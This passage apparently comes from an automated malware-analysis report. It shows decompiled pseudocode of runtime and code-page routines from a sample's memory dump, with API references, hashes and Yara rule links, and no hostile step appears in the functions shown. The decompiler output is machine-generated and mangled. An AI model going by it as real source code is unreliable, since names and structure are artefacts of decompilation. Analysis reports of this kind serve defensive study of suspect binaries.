						_t68 =  *(_t100 + _t92 * 2 - 0x704) & 0x0000ffff;
						if((_t68 & 0x00000001) == 0) {
							__eflags = _t68 & 0x00000002;
							if((_t68 & 0x00000002) == 0) {
								 *(_t99 + _t92 + 0x119) = 0;
							} else {
								_t37 = _t99 + _t92 + 0x19;
								 *_t37 =  *(_t99 + _t92 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t68 =  *((intOrPtr*)(_t100 + _t92 - 0x304));
								goto L15;
							}
						} else {
							 *(_t99 + _t92 + 0x19) =  *(_t99 + _t92 + 0x19) | 0x00000010;
							_t68 =  *((intOrPtr*)(_t100 + _t92 - 0x204));
							L15:
							 *(_t99 + _t92 + 0x119) = _t68;
						}
						_t92 = _t92 + 1;
					} while (_t92 < 0x100);
				}
				return E0020E203(_t68, _v8 ^ _t100);
			}





























          0x0021a51e
          0x0021a529
          0x0021a530
          0x0021a535
          0x0021a540
          0x0021a552
          0x0021a64a
          0x0021a64a
          0x0021a650
          0x0021a652
          0x0021a653
          0x0021a653
          0x0021a655
          0x0021a65b
          0x0021a65b
          0x0021a65d
          0x0021a65f
          0x0021a668
          0x0021a66b
          0x0021a677
          0x0021a67e
          0x0021a68e
          0x0021a680
          0x0021a680
          0x0021a683
          0x0021a683
          0x0021a683
          0x0021a687
          0x0021a687
          0x00000000
          0x0021a687
          0x0021a66d
          0x0021a66d
          0x0021a672
          0x0021a672
          0x0021a68a
          0x0021a68a
          0x0021a68a
          0x0021a690
          0x0021a696
          0x0021a696
          0x0021a69c
          0x0021a69d
          0x0021a69d
          0x0021a558
          0x0021a558
          0x0021a55a
          0x0021a55a
          0x0021a561
          0x0021a562
          0x0021a566
          0x0021a56c
          0x0021a572
          0x0021a59a
          0x0021a59a
          0x0021a59c
          0x00000000
          0x00000000
          0x0021a57b
          0x0021a57f
          0x0021a591
          0x0021a591
          0x0021a593
          0x00000000
          0x00000000
          0x0021a584
          0x0021a586
          0x0021a588
          0x0021a590
          0x0021a590
          0x00000000
          0x0021a590
          0x00000000
          0x0021a586
          0x0021a595
          0x0021a595
          0x0021a598
          0x0021a598
          0x0021a59f
          0x0021a5b4
          0x0021a5ba
          0x0021a5ce
          0x0021a5d5
          0x0021a5e4
          0x0021a5f6
          0x0021a5fd
          0x0021a605
          0x0021a607
          0x0021a607
          0x0021a611
          0x0021a621
          0x0021a623
          0x0021a63a
          0x0021a625
          0x0021a625
          0x0021a625
          0x0021a625
          0x0021a62a
          0x00000000
          0x0021a62a
          0x0021a613
          0x0021a613
          0x0021a618
          0x0021a631
          0x0021a631
          0x0021a631
          0x0021a641
          0x0021a642
          0x0021a646
          0x0021a6b1

          APIs
          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0021A543
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Info
          • String ID:
          • API String ID: 1807457897-3916222277
          • Opcode ID: 5832d25cc2d113db12c21f1cb628562f0b3e33bbfdb3ca7eb1a3f37eb1618a34
          • Instruction ID: 3aa7b79ee2e6fbd55c4956dbfdbe375c862fe0709d2fcea285cd5bd72468ce30
          • Opcode Fuzzy Hash: 5832d25cc2d113db12c21f1cb628562f0b3e33bbfdb3ca7eb1a3f37eb1618a34
          • Instruction Fuzzy Hash: A4411C70915388AEDF228E648C84BFABBFDEB65304F1804ECD59A86142D27599E5CF21
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F1D61, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON
          Download Yara Rule
          C-Code - Quality: 89%
          			E001F1D61(intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t34;
				intOrPtr _t41;
				intOrPtr _t51;
				void* _t62;
				unsigned int _t64;
				signed int _t66;
				intOrPtr* _t68;
				void* _t70;

				_t62 = __edx;
				_t51 = __ecx;
				E0020D870(E00221173, _t70);
				_t49 = 0;
				 *((intOrPtr*)(_t70 - 0x10)) = _t51;
				 *((intOrPtr*)(_t70 - 0x24)) = 0;
				 *(_t70 - 0x20) = 0;
				 *((intOrPtr*)(_t70 - 0x1c)) = 0;
				 *((intOrPtr*)(_t70 - 0x18)) = 0;
				 *((char*)(_t70 - 0x14)) = 0;
				 *((intOrPtr*)(_t70 - 4)) = 0;
				_t34 = E001F399D(_t51, _t62, _t70 - 0x24, 0, 0); // executed
				if(_t34 != 0) {
					_t64 =  *(_t70 - 0x20);
					E001F16C0(_t70 - 0x24, _t62, 1);
					_t68 =  *((intOrPtr*)(_t70 + 8));
					 *((char*)( *(_t70 - 0x20) +  *((intOrPtr*)(_t70 - 0x24)) - 1)) = 0;
					_t16 = _t64 + 1; // 0x1
					E001F1837(_t68, _t16);
					_t41 =  *((intOrPtr*)(_t70 - 0x10));
					if( *((intOrPtr*)(_t41 + 0x6cb0)) != 3) {
						if(( *(_t41 + 0x45f4) & 0x00000001) == 0) {
							E00200FDE( *((intOrPtr*)(_t70 - 0x24)),  *_t68,  *((intOrPtr*)(_t68 + 4)));
						} else {
							_t66 = _t64 >> 1;
							E00201059( *((intOrPtr*)(_t70 - 0x24)),  *_t68, _t66);
							 *((short*)( *_t68 + _t66 * 2)) = 0;
						}
					} else {
						_push( *((intOrPtr*)(_t68 + 4)));
						_push( *_t68);
						_push( *((intOrPtr*)(_t70 - 0x24)));
						E00201094();
					}
					E001F1837(_t68, E00212B33( *_t68));
					_t49 = 1;
				}
				E001F159C(_t70 - 0x24);
				 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
				return _t49;
			}











          0x001f1d61
          0x001f1d61
          0x001f1d66
          0x001f1d6f
          0x001f1d73
          0x001f1d76
          0x001f1d79
          0x001f1d7c
          0x001f1d7f
          0x001f1d82
          0x001f1d8a
          0x001f1d90
          0x001f1d97
          0x001f1d9f
          0x001f1da7
          0x001f1db2
          0x001f1db5
          0x001f1db9
          0x001f1dbf
          0x001f1dc4
          0x001f1dce
          0x001f1de6
          0x001f1e07
          0x001f1de8
          0x001f1de8
          0x001f1df0
          0x001f1df9
          0x001f1df9
          0x001f1dd0
          0x001f1dd0
          0x001f1dd3
          0x001f1dd5
          0x001f1dd8
          0x001f1dd8
          0x001f1e17
          0x001f1e1d
          0x001f1e1f
          0x001f1e23
          0x001f1e2e
          0x001f1e38

          APIs
          • __EH_prolog.LIBCMT ref: 001F1D66
            • Part of subcall function 001F399D: __EH_prolog.LIBCMT ref: 001F39A2
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: H_prolog
          • String ID: CMT
          • API String ID: 3519838083-2756464174
          • Opcode ID: d170b0d379be9cb4c89d23f8371494c9d959eb4ea855945561e1b0bc6b2015c3
          • Instruction ID: edd1475164d2b904421c96c2b4224dee77161db16dd35d1eed09ff3feb258bcc
          • Opcode Fuzzy Hash: d170b0d379be9cb4c89d23f8371494c9d959eb4ea855945561e1b0bc6b2015c3
          • Instruction Fuzzy Hash: E4214B71904209EFCB15EF98C9459EEFBF6FF59300F1000A9E955A7252C7325E61CB60
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00219C64, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
          Download Yara Rule
          C-Code - Quality: 37%
          			E00219C64(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _t18;
				intOrPtr* _t20;
				int _t22;
				intOrPtr* _t30;
				signed int _t32;

				_t25 = __ecx;
				_push(__ecx);
				_t18 =  *0x22d668; // 0x4319796a
				_v8 = _t18 ^ _t32;
				_push(__esi);
				_t20 = E00219990(0x16, "LCMapStringEx", 0x226084, "LCMapStringEx"); // executed
				_t30 = _t20;
				if(_t30 == 0) {
					_t22 = LCMapStringW(E00219CEC(_t25, _t30, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0x222260(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					_t22 =  *_t30();
				}
				return E0020E203(_t22, _v8 ^ _t32);
			}









          0x00219c64
          0x00219c69
          0x00219c6a
          0x00219c71
          0x00219c74
          0x00219c86
          0x00219c8b
          0x00219c92
          0x00219cd5
          0x00219c94
          0x00219cb1
          0x00219cb7
          0x00219cb7
          0x00219ce9

          APIs
          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,31E85006,00000001,?,000000FF), ref: 00219CD5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: String
          • String ID: LCMapStringEx
          • API String ID: 2568140703-3893581201
          • Opcode ID: b8eed35cdeaf8d96b0fdff4798f1b8a50ca8c91063d843b534089033aa7cb0c8
          • Instruction ID: 5679fbf68432a4b443357dc39e62acea254aa0ef1b24aa806e866a0a312baeb4
          • Opcode Fuzzy Hash: b8eed35cdeaf8d96b0fdff4798f1b8a50ca8c91063d843b534089033aa7cb0c8
          • Instruction Fuzzy Hash: 8901D332551219FBCF22AF90ED19DEE3FA6FB08750F014515FE1526161C6738AB1EB90
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00219C02, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
          Download Yara Rule
          C-Code - Quality: 37%
          			E00219C02(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t8;
				intOrPtr* _t10;
				int _t11;
				intOrPtr* _t19;
				signed int _t21;

				_push(__ecx);
				_t8 =  *0x22d668; // 0x4319796a
				_v8 = _t8 ^ _t21;
				_t10 = E00219990(0x14, "InitializeCriticalSectionEx", 0x22607c, 0x226084); // executed
				_t19 = _t10;
				if(_t19 == 0) {
					_t11 = InitializeCriticalSectionAndSpinCount(_a4, _a8);
				} else {
					 *0x222260(_a4, _a8, _a12);
					_t11 =  *_t19();
				}
				return E0020E203(_t11, _v8 ^ _t21);
			}









          0x00219c07
          0x00219c08
          0x00219c0f
          0x00219c24
          0x00219c29
          0x00219c30
          0x00219c4d
          0x00219c32
          0x00219c3d
          0x00219c43
          0x00219c43
          0x00219c61

          APIs
          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00219291), ref: 00219C4D
          Strings
          • InitializeCriticalSectionEx, xrefs: 00219C1D
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: CountCriticalInitializeSectionSpin
          • String ID: InitializeCriticalSectionEx
          • API String ID: 2593887523-3084827643
          • Opcode ID: 020ddeca5bf696edd06a4916e9f77fad17aa87910208539c283256938eeabd1a
          • Instruction ID: a1d371b4d32d89b38ed12486a1868932d8e19c8bb17ea89c11deba9d134cdc2b
          • Opcode Fuzzy Hash: 020ddeca5bf696edd06a4916e9f77fad17aa87910208539c283256938eeabd1a
          • Instruction Fuzzy Hash: 87F0B431A5121CFBCB21AF90EC09CEE7FA5EF09720B014155FD0816161CA724EB1EBC0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00219AA7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
          Download Yara Rule
          C-Code - Quality: 37%
          			E00219AA7(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _t4;
				intOrPtr* _t6;
				long _t7;
				intOrPtr* _t15;
				signed int _t17;

				_push(__ecx);
				_t4 =  *0x22d668; // 0x4319796a
				_v8 = _t4 ^ _t17;
				_t6 = E00219990(3, "FlsAlloc", 0x226040, 0x226048); // executed
				_t15 = _t6;
				if(_t15 == 0) {
					_t7 = TlsAlloc();
				} else {
					 *0x222260(_a4);
					_t7 =  *_t15();
				}
				return E0020E203(_t7, _v8 ^ _t17);
			}









          0x00219aac
          0x00219aad
          0x00219ab4
          0x00219ac9
          0x00219ace
          0x00219ad5
          0x00219ae6
          0x00219ad7
          0x00219adc
          0x00219ae2
          0x00219ae2
          0x00219afa

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Alloc
          • String ID: FlsAlloc
          • API String ID: 2773662609-671089009
          • Opcode ID: 9196c39fb6c86d349320b4f92688445101ab8a883508254bc2daea7794d7beea
          • Instruction ID: 817a9fb8ceb97c20eff3c28d901f0b66325093987c19ecaa6693ce7e6980f022
          • Opcode Fuzzy Hash: 9196c39fb6c86d349320b4f92688445101ab8a883508254bc2daea7794d7beea
          • Instruction Fuzzy Hash: 41E05531A60228FB8730AFE1BC0ADAEBBA8EF15710B000058FC0913281CE714EA19AC4
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0021281A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
          Download Yara Rule
          C-Code - Quality: 68%
          			E0021281A(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t2;
				intOrPtr* _t6;

				_t2 = E002126F9(4, "FlsAlloc", 0x224394, "FlsAlloc"); // executed
				_t6 = _t2;
				if(_t6 == 0) {
					return TlsAlloc();
				}
				L0020E2DD();
				return  *_t6(_a4);
			}





          0x0021282f
          0x00212834
          0x0021283b
          0x0021284e
          0x0021284e
          0x00212842
          0x0021284b

          APIs
          • try_get_function.LIBVCRUNTIME ref: 0021282F
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: try_get_function
          • String ID: FlsAlloc
          • API String ID: 2742660187-671089009
          • Opcode ID: d01f090cfa76759018af39047225f6e247bbd1c02104c909ca278963f78c32a7
          • Instruction ID: 32f7ac7979fd9d13e26b9a0472fbe61b225c814467ce41c03a59ee30079d77b0
          • Opcode Fuzzy Hash: d01f090cfa76759018af39047225f6e247bbd1c02104c909ca278963f78c32a7
          • Instruction Fuzzy Hash: ECD05B31795774F7C62076D57C02ADA7E98C702BB1F0601A2FF0C65183D555547056D1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0021A873, Relevance: 3.2, APIs: 2, Instructions: 168COMMON
          Download Yara Rule
          C-Code - Quality: 97%
          			E0021A873(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed int _t60;
				signed char _t62;
				signed int _t63;
				signed char* _t71;
				signed char* _t72;
				int _t76;
				signed int _t79;
				signed char* _t80;
				short* _t81;
				int _t85;
				signed char _t86;
				signed int _t87;
				signed int _t89;
				signed int _t90;
				int _t92;
				int _t93;
				intOrPtr _t96;
				signed int _t97;

				_t48 =  *0x22d668; // 0x4319796a
				_v8 = _t48 ^ _t97;
				_t96 = _a8;
				_t76 = E0021A446(__eflags, _a4);
				if(_t76 != 0) {
					_t92 = 0;
					__eflags = 0;
					_t79 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0x22d828)) - _t76;
						if( *((intOrPtr*)(_t51 + 0x22d828)) == _t76) {
							break;
						}
						_t79 = _t79 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t79;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t76 - 0xfde8;
							if(_t76 == 0xfde8) {
								L23:
								_t60 = _t51 | 0xffffffff;
							} else {
								__eflags = _t76 - 0xfde9;
								if(_t76 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t76 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t76,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0x250854 - _t92; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E0021A4B9(_t96);
												goto L37;
											}
										} else {
											E0020E920(_t92, _t96 + 0x18, _t92, 0x101);
											 *(_t96 + 4) = _t76;
											 *(_t96 + 0x21c) = _t92;
											_t76 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t96 + 8) = _t92;
											} else {
												__eflags = _v22;
												_t71 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t86 = _t71[1];
														__eflags = _t86;
														if(_t86 == 0) {
															goto L16;
														}
														_t89 = _t86 & 0x000000ff;
														_t87 =  *_t71 & 0x000000ff;
														while(1) {
															__eflags = _t87 - _t89;
															if(_t87 > _t89) {
																break;
															}
															 *(_t96 + _t87 + 0x19) =  *(_t96 + _t87 + 0x19) | 0x00000004;
															_t87 = _t87 + 1;
															__eflags = _t87;
														}
														_t71 =  &(_t71[2]);
														__eflags =  *_t71;
														if( *_t71 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t72 = _t96 + 0x1a;
												_t85 = 0xfe;
												do {
													 *_t72 =  *_t72 | 0x00000008;
													_t72 =  &(_t72[1]);
													_t85 = _t85 - 1;
													__eflags = _t85;
												} while (_t85 != 0);
												 *(_t96 + 0x21c) = E0021A408( *(_t96 + 4));
												 *(_t96 + 8) = _t76;
											}
											_t93 = _t96 + 0xc;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E0021A51E(_t76, _t89, _t93, _t96, _t96); // executed
											L37:
											_t60 = 0;
											__eflags = 0;
										}
									}
								}
							}
						}
						goto L39;
					}
					E0020E920(_t92, _t96 + 0x18, _t92, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0x22d838;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t80 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t80[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t90 =  *_t80 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t90 - _t63;
									if(_t90 > _t63) {
										break;
									}
									__eflags = _t90 - 0x100;
									if(_t90 < 0x100) {
										_t31 = _t92 + 0x22d820; // 0x8040201
										 *(_t96 + _t90 + 0x19) =  *(_t96 + _t90 + 0x19) |  *_t31;
										_t90 = _t90 + 1;
										__eflags = _t90;
										_t63 = _t80[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t80 =  &(_t80[2]);
								__eflags =  *_t80;
								if( *_t80 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t92 = _t92 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t92 - 4;
					} while (_t92 < 4);
					 *(_t96 + 4) = _t76;
					 *(_t96 + 8) = 1;
					 *(_t96 + 0x21c) = E0021A408(_t76);
					_t81 = _t96 + 0xc;
					_t89 = _v36 + 0x22d82c;
					_t93 = 6;
					do {
						_t58 =  *_t89;
						_t89 = _t89 + 2;
						 *_t81 = _t58;
						_t81 = _t81 + 2;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L36;
				} else {
					E0021A4B9(_t96);
					_t60 = 0;
				}
				L39:
				return E0020E203(_t60, _v8 ^ _t97);
			}































          0x0021a87b
          0x0021a882
          0x0021a88a
          0x0021a892
          0x0021a897
          0x0021a8a8
          0x0021a8a8
          0x0021a8aa
          0x0021a8ac
          0x0021a8ae
          0x0021a8b1
          0x0021a8b1
          0x0021a8b7
          0x00000000
          0x00000000
          0x0021a8bd
          0x0021a8be
          0x0021a8c1
          0x0021a8c4
          0x0021a8c9
          0x00000000
          0x0021a8cb
          0x0021a8cb
          0x0021a8d1
          0x0021a99f
          0x0021a99f
          0x0021a8d7
          0x0021a8d7
          0x0021a8dd
          0x00000000
          0x0021a8e3
          0x0021a8e7
          0x0021a8ed
          0x0021a8ef
          0x00000000
          0x0021a8f5
          0x0021a8fa
          0x0021a900
          0x0021a902
          0x0021a98c
          0x0021a992
          0x00000000
          0x0021a994
          0x0021a995
          0x00000000
          0x0021a995
          0x0021a908
          0x0021a912
          0x0021a917
          0x0021a91f
          0x0021a925
          0x0021a926
          0x0021a929
          0x0021a97c
          0x0021a92b
          0x0021a92b
          0x0021a92f
          0x0021a932
          0x0021a934
          0x0021a934
          0x0021a937
          0x0021a939
          0x00000000
          0x00000000
          0x0021a93b
          0x0021a93e
          0x0021a949
          0x0021a949
          0x0021a94b
          0x00000000
          0x00000000
          0x0021a943
          0x0021a948
          0x0021a948
          0x0021a948
          0x0021a94d
          0x0021a950
          0x0021a953
          0x00000000
          0x00000000
          0x00000000
          0x0021a953
          0x0021a934
          0x0021a955
          0x0021a955
          0x0021a958
          0x0021a95d
          0x0021a95d
          0x0021a960
          0x0021a961
          0x0021a961
          0x0021a961
          0x0021a971
          0x0021a977
          0x0021a977
          0x0021a981
          0x0021a984
          0x0021a985
          0x0021a986
          0x0021aa4a
          0x0021aa4b
          0x0021aa50
          0x0021aa51
          0x0021aa51
          0x0021aa51
          0x0021a902
          0x0021a8ef
          0x0021a8dd
          0x0021a8d1
          0x00000000
          0x0021aa53
          0x0021a9b1
          0x0021a9b9
          0x0021a9b9
          0x0021a9bd
          0x0021a9c0
          0x0021a9c6
          0x0021a9c9
          0x0021a9c9
          0x0021a9cc
          0x0021a9ce
          0x0021a9d0
          0x0021a9d0
          0x0021a9d3
          0x0021a9d5
          0x00000000
          0x00000000
          0x0021a9d7
          0x0021a9da
          0x0021a9f6
          0x0021a9f6
          0x0021a9f8
          0x00000000
          0x00000000
          0x0021a9df
          0x0021a9e5
          0x0021a9e7
          0x0021a9ed
          0x0021a9f1
          0x0021a9f1
          0x0021a9f2
          0x00000000
          0x0021a9f2
          0x00000000
          0x0021a9e5
          0x0021a9fa
          0x0021a9fd
          0x0021aa00
          0x00000000
          0x00000000
          0x00000000
          0x0021aa00
          0x0021aa02
          0x0021aa02
          0x0021aa05
          0x0021aa06
          0x0021aa09
          0x0021aa0c
          0x0021aa0c
          0x0021aa12
          0x0021aa15
          0x0021aa24
          0x0021aa2d
          0x0021aa32
          0x0021aa38
          0x0021aa39
          0x0021aa39
          0x0021aa3c
          0x0021aa3f
          0x0021aa42
          0x0021aa45
          0x0021aa45
          0x0021aa45
          0x00000000
          0x0021a899
          0x0021a89a
          0x0021a8a0
          0x0021a8a0
          0x0021aa54
          0x0021aa63

          APIs
            • Part of subcall function 0021A446: GetOEMCP.KERNEL32(00000000,?,?,0021A6CF,?), ref: 0021A471
          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0021A714,?,00000000), ref: 0021A8E7
          • GetCPInfo.KERNEL32(00000000,0021A714,?,?,?,0021A714,?,00000000), ref: 0021A8FA
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: CodeInfoPageValid
          • String ID:
          • API String ID: 546120528-0
          • Opcode ID: 87db288934526991c195e381877198561a6ee5b8f33adf20793f2f364d6ade53
          • Instruction ID: 426ac644421bfff5cf3ea91abdd01dc251666ad221a4bd43d4d7097d75a3ea04
          • Opcode Fuzzy Hash: 87db288934526991c195e381877198561a6ee5b8f33adf20793f2f364d6ade53
          • Instruction Fuzzy Hash: 19517670922346AFDB20CF71C8456FBBBF5AF20310F15402ED0868B242D67999D6CB92
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F1382, Relevance: 3.1, APIs: 2, Instructions: 96COMMON
          Download Yara Rule
          C-Code - Quality: 98%
          			E001F1382(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t56;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E0020D870(_t56, _t91);
				_push(_t78);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E001F943C(_t78);
				 *_t89 = 0x2222e8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E001F5E99(_t89 + 0x1024, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E001FC4CA(_t89 + 0x20e8, _t86, _t96);
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E001F151B();
				_t62 = E001F151B();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E0020D82C(_t86, _t89, _t98, 0x82e8);
					 *((intOrPtr*)(_t91 + 8)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E001FAD1B(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
